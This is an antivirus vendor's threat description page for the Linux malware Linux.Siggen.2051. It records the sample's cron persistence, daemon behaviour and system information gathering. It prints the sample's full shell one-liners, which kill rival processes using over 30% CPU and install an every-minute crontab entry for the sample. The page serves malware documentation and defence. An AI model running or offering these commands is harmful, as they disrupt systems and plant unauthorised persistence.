Linux.Siggen.2051
Added to the Dr.Web virus database:
2019-08-04
Virus description added:
2019-08-03
Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /var/spool/cron/crontabs/root
Malicious functions:
Launches itself as a daemon
Launches processes:
- sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- 'libserv[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- 'libserv[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi
- id -u
- ps aux
- grep -v grep
- grep -v /usr/sbin/httpd
- grep -v -- libserv[[:space:]]*$
- awk {if($3>30.0) print $2}
- sh -c dir=`pwd 2>/dev/null`;rm -rf $dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '<SAMPLE_FULL_PATH>' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '$dir/'<SAMPLE_FULL_PATH>' >> .cron 2>/dev/null; if [ $(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '<SAMPLE_FULL_PATH>$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab $dir/.cron 2>/dev/null; fi;rm -rf $dir/.cron 2>/dev/null
- rm -rf /root/.cron
- crontab -l
- grep -v <SAMPLE_FULL_PATH>
- grep <SAMPLE_FULL_PATH>$
- sort
- uniq
- wc -l
- crontab /root/.cron
- sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'libserv[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'libserv[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'libserv[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'libserv[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi fi
- grep -- libserv[[:space:]]*$
Kills the following processes:
Performs operations with the file system:
Modifies file access rights:
- /var/spool/cron/crontabs/tmp.m9LggH
Creates or modifies files:
- /root/.cron
- /var/spool/cron/.cron
- /var/spool/cron/crontabs/tmp.m9LggH
- /tmp/.lock
Deletes files:
Network activity:
Establishes connection:
DNS ASK:
Sends data to the following servers:
Receives data from the following servers:
Other:
Collects CPU information
Collects RAM information
Collects information about network activity
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
欢迎下载
Dr.Web for Android
-
免费3个月
-
可使用所有保护组件
-
可在AppGallery/Google Pay延期
继续使用此网站意味着您同意我们使用Cookie文件和其他用于收集网站访问统计信息的技术手段。详细信息